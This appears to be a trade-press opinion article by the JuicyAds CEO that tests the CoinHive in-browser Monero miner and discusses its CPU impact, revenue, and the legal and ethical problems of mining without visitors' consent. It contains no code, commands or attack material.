CoinHive: Advertising Alternative or Exploit

CoinHive: Advertising Alternative or Exploit

About two months ago I read about CoinHive and it sounded interesting. CoinHive provides software that will execute a mining program for the Monero crypocurrency.

It allows you to use the CPU resources of your computer to mine for this crypocurrency, just like how people have been operating Bitcoin rigs for years. The company also provides a handy “ReCAPTCHA”-style anti-hitbot script.

This solution has a long way to go before it could even come close to replacing advertising revenue for publishers.

At the time of this writing, one Monero was worth $100.60.

The controversy is that people are not using their own computers to execute this script, and it’s not their own personal CPU resources being utilized.

You see, CoinHive provides this script to be placed on your website. If it were a script that operated on your hosting server, that may pose an issue on a shared hosting environment, causing some problems for your hosting company. But that’s also not what is going on.

The controversy is that as a piece of JavaScript, CoinHive executes on the website visitor’s computer (client-side). This directly taps into the CPU of anyone visiting that website and thereby spikes CPU usage and reduces computer performance.

Ultimately this can result in a bad website experience as well.

In early November, Ultimate Fighting Championship’s website was accused of running the cryptominer. Similarly, a small handful of top-ranking websites were using the script and have been exposed for exploitation of visitors who had not been informed.

It was only a matter of time until someone would attempt to get this past our anti-malware detections here at JuicyAds.

When the domain ZettaStomp.com registered to someone in Mexico alerted us that it was running the CoinHive script, I decided it was time to find out if it really does cause a poor surfing experience and if it was truly a threat.

The ZettaStomp.com landing page, comprised of just an iTunes button (and the CoinHive code) did not set off any alerts in Avast antivirus or any firewalls. In fact, there was really no indication it was running at all on our test PC, running an Intel i5-6400 Quad-Core CPU.

The CPU load immediately shot upwards and processed consistently around 80 percent of maximum load. I found no significant impact at all in using the computer, so I got more aggressive. I started surfing the Internet, played some MP3s, and then fired up multiple YouTube videos.

The test PC started to lag and CPU usage bumped up over 90 percent, but nothing terribly annoying. It did not seem to have any issue whatsoever handling the “exploitation” of its CPU by the CoinHive Javascript.

When I ran the miner from CoinHive.com directly, it showed that with my machine mostly idle, it would process approximately 26-30 hashes per second with my CPU pegged at 90-100 percent.

When I started running more applications the hash rate dropped, bumping up the threads only lagged the computer until it was unresponsive. This coming in the age of ad blockers, which have disrupted decades of the advertising-supported internet. These users are obliviously running around the internet advertising-free and not paying for anything (but still consuming resources).

They will ultimately be responsible for the end of free internet, surely to be replaced by subscription-based monetization models. This is running free website publishers into a corner where things like CoinHive become attractive, and it represents what may very well be a solution to the problem of the “free Internet” by providing a pseudo “free pay-to-play” model.

Direct consumers could provide their CPU resources for an amount of time that equally correlates with the amount of resources or costs to use the website, and would allow the publisher to profit from each user, but it’s just not that simple.

Ironically, the response from ad-blocking companies has been to block CoinHive script, choking this source of potential cash for publishers from the growing group of freeloading leechers. Likewise, this is not something you will find on an advertising network like JuicyAds.

Even though our Test PC did not flag using Avast, our anti-malware detection alerted us immediately. JuicyAds has a history of helping to criminally prosecute illegal malware distribution, and similarly in this case, the campaign was immediately disabled and advertiser sent packing.

As you can imagine, the anti-virus and anti-malware companies has similarly labelled CoinHive as a threat. According to TheRegister.co.uk, Malwarebytes alone has received over 130 million requests from users to block CoinHive, but even the director of Malwarebytes Labs provided a moderate statement regarding the technology:

“We do not claim that Coin Hive is malicious, or even necessarily a bad idea. The concept of allowing folks to opt-in for an alternative to advertising, which has been plagued by everything from fake news to malvertising, is a noble one. The execution of it is another story.”

Coin Hive’s response appeared equally genuine and understanding regarding the ban-hammer coming down on them, reportedly saying, “We can’t blame them.”

In fact, CoinHive has already announced the alternative “AuthedMine” which requires implicit user consent for the coin miner to operate. Their website requests the support of ad-blocking and antivirus companies to allow the software to operate uninhibited. When I tested this solution, the CPU usage increased to approximately 40 percent.

Even if we assume that it’s both ethical and moral to basically hijack someone’s CPU for profit without their knowledge or consent, is it legal? I had no idea, so I enlisted the help of Corey Silverstein from Silverstein Legal to answer that:

“Mining cryptocurrency isn’t per se illegal. Things to consider here in terms of legal issues will involve the terms of service and privacy policy on the website where the mining operations are taking place. ‘Browser wrapped’ agreements (where the terms are just at the bottom of the page) have been deemed unbinding by different courts, because the user does not know they are there or what they include. Websites should be implementing a methodology for its users to agree to their legal documents via a check-box or some other type of e-signature,” Silverstein said.

“This practice could ultimately be something the FTC may look at; the FTC is no stranger to utilizing its powers to go after those who engage in fraudulent or deceptive trade practices and this type of hijacking could fit right into the FTC’s jurisdiction. Additionally, failure to inform website visitors or get consent to use their computing resources could start a chain of individual or class action lawsuits. Regardless, of when and how these type of website operators get in legal trouble, the idea of utilizing someone’s CPU resources without warning or consent is a recipe for disaster and eventually there will be consequences.”

According to an article from Pixalate, nearly 62 percent of the websites it found running CoinHive did not have a posted Terms and Conditions at all, and even more did not have a Privacy Policy (although, its unclear whether privacy is a relevant issue here).

So all of the legality aside, is the juice worth the squeeze? Probably not.

Simply running the miner on your computer with an average 30 per second hashrate, for a total of 10 hours per day, with the CoinHive miner would earn you approximately $0.49 per month. That isn’t even worth the amount of power the computer uses while its operating.

If you set up the miner on your website and say you had 1 million visitors per month to your website, with a 30-per-second hash rate, an average time on website of five minutes, with the CoinHive miner that pays out0.00015 Monero (XMR) per million hashes, you would expect to earn (drumroll) 1.35 Monero, or approximately $135 per month.

But what if Monero was worth as much as Bitcoin, surging recently to $10,000? Then it would make sense, right? Yes and no. While its true this math is a whole lot more attractive at $10,000 rather than the $100 current value of Monero, crypocurrencies work in a closed system with a finite amount of coin. This controls the value by how much of it is in circulation, and how much is available to be mined. The problem is strictly mathematics.

As the popularity of Monero grows and more and more websites mine the cryptocurrency, the number of available coins (and payments to the miners or publishers) will drop over time. Therefore, the cryptocurrency advertising solution for publishers has a limited lifespan built in, and over time will yield less and less revenue for the same amount of CPU work. That does not take into account any change in trading price of the Monero (speculators cause bubbles, and bubbles always burst). Things rarely (if ever) go up indefinitely.

After over a month of testing, my account is up to a whopping 0.00349 Monero, or $0.35.

CoinHive has suggested this technology is meant to replace advertising but with the rampant abuse, the auto-mining solution blocked by the same ad blocker and an opt-in model likely to produce significantly less revenue, this solution has a long way to go before it could even come close to replacing advertising revenue for publishers.

Juicy Jay is CEO and founder of JuicyAds. Readers can follow Jay on Twitter, @juicyads, visit JuicyAds.com, or like on Facebook.com/juicyads.


More Articles


Through the Hourglass: A Day in the Life of Burning Angel

Small Hands ·

WIA Profile: Dusty Marie

Women In Adult ·

Q&A: JustFor.fans Founder Dominic Ford Reveals Grand Plans

Alejandro Freixes ·

This Ain’t Ad Blocking, It’s an Arms Race

Juicy Jay ·

The U.K. Bucks the Business Landscape

Cathy Beardsley ·

A Legal Toolkit for Cam Models

Maxine Lynn ·

Speeding Down the ACH Payments Superhighway

Jonathan Corona ·

WIA Profile: Salima

Women In Adult ·

7 Emoji Tips for Push Notifications

Giles Hirst ·

How to Stress Less in the New Year

Cathy Beardsley ·
Show More